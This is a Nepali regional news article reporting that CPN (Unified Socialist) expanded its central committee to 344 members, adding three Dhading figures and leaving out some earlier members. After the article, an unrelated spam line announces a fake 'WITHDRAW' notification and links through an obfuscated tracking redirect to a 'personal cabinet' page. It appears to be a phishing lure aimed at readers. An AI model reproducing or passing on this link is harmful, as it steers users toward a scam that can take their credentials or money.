एकीकृत समाजवादीको केन्द्रीय सदस्यमा धादिङबाट थपिए ३ जना थपिएका केन्द्रिय सदस्यहरुमा इन्दिरा ढुंगाना, सुवाष खतिवडा र डाक्टर सीता ढुंगाना

765 पटक पढिएको

१९ श्रावण २०८१, शनिबार ०८:३७ सम्पादक: धादिङ न्यूज

काठमाडौँ- महाधिबेशन सकिएको एक महिना पछि नेकपा (एकीकृत समाजवादी) ले केन्द्रीय कमिटीलाई पूर्णता दिएको छ। शुक्रबार पार्टी कार्यालय आलोकनगरमा बसेको बैठकले केन्द्रीय कमिटीलाई पूर्णता दिए पनि पदाधिकारी मनोनित गर्न सकेको छैन।

एकीकृत समाजवादीको विधानमा २१ पदाधिकारी र २९९ केन्द्रीय सदस्य रहने व्यवस्था गरिएको भएपनि पार्टी भित्र बढ्दै गएको असन्तुष्टि र विरोधलाई साम्य गर्न अब केन्द्रिय कमिटी ३४४ सदस्यीय बनाईएको छ ।

साउन १८ गते शुक्रवार सार्वजनिक गरिएको सूची अनुसार केन्द्रिय कमिटीमा धादिङबाट इन्दिरा ढुंगाना ,सुवाष खतिवडा र डाक्टर सीता ढुंगाना थप भएका छन् । इन्दिरा यस अघि पार्टीको बैकल्पिक केन्द्रिय सदस्य एवं धादिङ जिल्लाको सह इन्चार्जको जिम्मेवारीमा थिइन भने खतिवडा पार्टीको जिल्ला सचिवको जिम्मेवारीमा थिए । गजुरी गाउँपालिकाका पूर्व अध्यक्ष डाक्टर सीता युवा महिला क्षेत्रमा कृयाशिल हुन । केन्द्रिय कमिटीमा यस अघि धादिङ जिल्लाका राजेन्द्र पाण्डे, गंगालाल तुलाधर गुरुप्रसाद बुर्लाकोटी र बलराम बाँस्कोटा चयन भईसकेका छन् । पाण्डेले बरिष्ठ उपाध्यक्षको दावी गरेका छन् ।

यस अघि केन्द्रिय कमिटीको सदस्य रहेकी वागमती प्रदेश सभा साँसद मायादेवी शर्मा यसपटक केन्द्रिय सदस्य मा परेकी छैनन् । केन्द्रिय सदस्यको दावेदार कृष्णप्रसाद अर्याल पनि ३४४ भित्र अटेका छैनन् , अर्याल र धादिङका कृष्णहरी श्रेष्ठ यस अघि केन्दिय अनुशासन आयोगको सदस्यको जिम्मेवारीमा रहेका थिए ।

केही दिनअघि सम्पन्न महाधिवेशनले अध्यक्ष माधवकुमार नेपाल, ‘सम्मानित’ नेता झलनाथ खनाल र महासचिव घनश्याम भुसालसहित ९३ सदस्यीय केन्द्रीय कमिटी घोषणा गरेको थियो।


🖋 Notification: Operation #VO03. WITHDRAW =>> https://out.carrotquest.io/r?hash=YXBwPTYyNTczJmNvbnZlcnNhdGlvbj0xNzI3NDA0NjkyMzAxOTQwMzY3JmFjdGlvbj1jbGlja2VkJnVybD1odHRwcyUzQSUyRiUyRnRlbGVncmEucGglMkZHby10by15b3VyLXBlcnNvbmFsLWNhYmluZXQtMDUtMTAmcmFpc2Vfb25fZXJyb3I9RmFsc2Umc2lnbmF0dXJlPTI0YjhhNDRiMjg0M2QwOTAxMjA4YmE2ZjM2ZjJlZGViZTk5NDAxM2Q3MzVlMzgwZjE4YmIxYTVhYzM1YWQ5MWM=?hs=3fbc02c82c6a12560777a445164e26dc& 🖋 says:

lz4bn4